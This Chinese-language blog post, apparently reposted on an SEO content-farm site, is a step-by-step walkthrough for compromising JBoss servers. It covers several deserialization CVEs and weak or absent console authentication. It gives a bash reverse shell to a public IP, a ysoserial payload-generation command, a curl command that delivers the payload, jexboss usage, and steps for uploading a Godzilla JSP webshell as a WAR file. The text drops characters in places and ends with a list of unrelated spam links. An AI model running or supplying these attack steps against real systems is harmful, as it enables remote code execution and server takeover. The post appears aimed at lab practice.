当前位置: 首页 > wzjs >正文

开发板一般在周几更新seo外链查询工具

开发板一般在周几更新,seo外链查询工具,做app推广上哪些网站吗,网站建设后期怎样维护CVE-2015-7501 Jboss JMXInvokerServlet 反序列化漏洞,这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利用Apache Commons Collections中的 Gadget 执⾏任意代码 访问地址 http://39…

CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞,这是典的JBoss反序列化漏洞JBoss/invoker/JMXInvokerServlet读取户传⼊的对我们利用Apache Commons Collections   Gadget 任意代

 访问地址 http://39.105.61.160:8080/invoker/JMXInvokerServlet1.返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

 下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

 将反弹shell进⾏base64编码

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

 监听6666端口

使用cmd

 java -jar "C:\Users\23215.呵呵\Documents\WeChat Files\wxid_1jxr0075qqd422\FileStorage\File\2025-03\ysoserial-all.jar" CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNjEuMTYwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

执行后在当前目录会生成一个exp.ser

再使用curl http://39.105.61.160:8080/invoker/JMXInvokerServlet --data-binary @exp.ser,那么就可以成功监听到端口

CVE-2017-7504

JBossMQ JMS 序列化漏洞,JBoss AS 4.x之前版本中JbossMQJMS over HTTP Invocation LayerHTTPServerILServlet.java序列化漏洞者可借助特制的序列化数据漏洞执任意代码执

访问漏洞地址,出现此页面说明存在漏洞

http://39.105.61.160:8080/jbossmq-httpil/HTTPServerILServlet

 在kali中使用jexboss工具

python3 jexboss.py -u http://39.105.61.160:8080

 

拿到shell 

​​​​​​​CVE-2017-12149

JBoss 5.x/6.x序列化漏洞,该漏洞为 Java序列化错在于 Jboss  HttpInvoker 件中的 ReadOnlyAccessFilter滤器中过滤器在没有进任何查的情况尝试将⾃客数据流进⾏反序列化⽽导了漏洞

使用jboss反序列化_CVE-2017-12149.jar

 ​​​​​​​Administration Console

Administration Console⻚⾯存在弱`admin:admin`陆后台war , getshell

 访问漏洞⻚⾯,出现404则存在漏洞

http://39.105.61.160:8080/invoker/readonly

点击Administration console

 使用弱口令登录,admin;vulhub

 点击Web Application (WAR)->Add New Web Application (WAR)

使用哥斯拉生成jsp木马,写入shell.jsp,压缩为shell.zip,将名字改为shell.war 

上传后通过http://39.105.61.160:8080/shell/shell.jsp访问,可使用哥斯拉连接就可以了

​​​​​​​低版本JMX  Console未授

JMX Console未授权访问Getshell,此漏洞JBoss/jmx-console/HtmlAdaptor路径对开放有任何身份致攻以进⼊到   jmx并在中执任何

点击JMX Console

使用弱口令登录,admin;admin

 

 登陆后找到jboss.deployment

 点击flavor=URL后找到void addURL(),第一个

将shell.war放到服务器上

 http://39.105.61.160/shell.war

点击Invoke, 出现下图代表成功

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

版本JMX  Console未授

JMX Console访接点JBoss  JMX Console 接进JMX Console⻚⾯, 通过部war, getshell

点击JMX Console,账号admin;vulhub

 登陆后点击jboss.system->service=MainDeployer

 找到deloy部署http://39.105.61.160/shell.war,点击Invoke

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

http://www.dtcms.com/wzjs/206121.html

相关文章:

  • 专业做网站哪家强广告联盟自动挂机赚钱
  • 有哪些效果图做的好的网站网络推广方法大全
  • 网站设计与网站建设课程代码短视频运营是做什么的
  • 企业网站主页设计图百度seo泛解析代发排名
  • 网站验证码是如何做的注册城乡规划师好考吗
  • 小小影视大全免费高清版常州seo
  • b2c网站建设方案书泰安网站建设优化
  • 平面设计师推荐网站北京优化靠谱的公司
  • 巫山网站建设企业邮箱网页版
  • 无锡企业网上迁移保定关键词优化软件
  • 零基础做地方门户网站深圳平台推广
  • 网站建设高营销软件
  • 山西省建设资格注册中心网站百度搜索数据
  • 网站写好了怎么做后台管理关键词优化seo费用
  • 健康生活网站开发系统背景长沙seo男团
  • 两支队伍建设专题网站aso优化重要吗
  • 中央军事新闻最新消息长沙seo公司
  • 做响应式网站好不好百度知道合伙人官网登录入口
  • 网上购物平台口碑排名排名优化网站seo排名
  • 安远做网站潍坊网站建设seo
  • 制作公司网站设品牌全网推广
  • 怎么做校园表白网站武汉seo工厂
  • php网站部署步骤打广告去哪个平台
  • 网站移动适配怎么做在线域名查询网站
  • 微信公众平台小程序官网河北百度seo
  • 免费1级做爰片免费网站批量查询指数
  • 德州建设网站青岛网络工程优化
  • 网站建设需要经过哪几个步骤上海网站优化
  • 阿里云服务器搭建wordpress上海seo优化公司
  • 做公司网站每年多少钱代做百度首页排名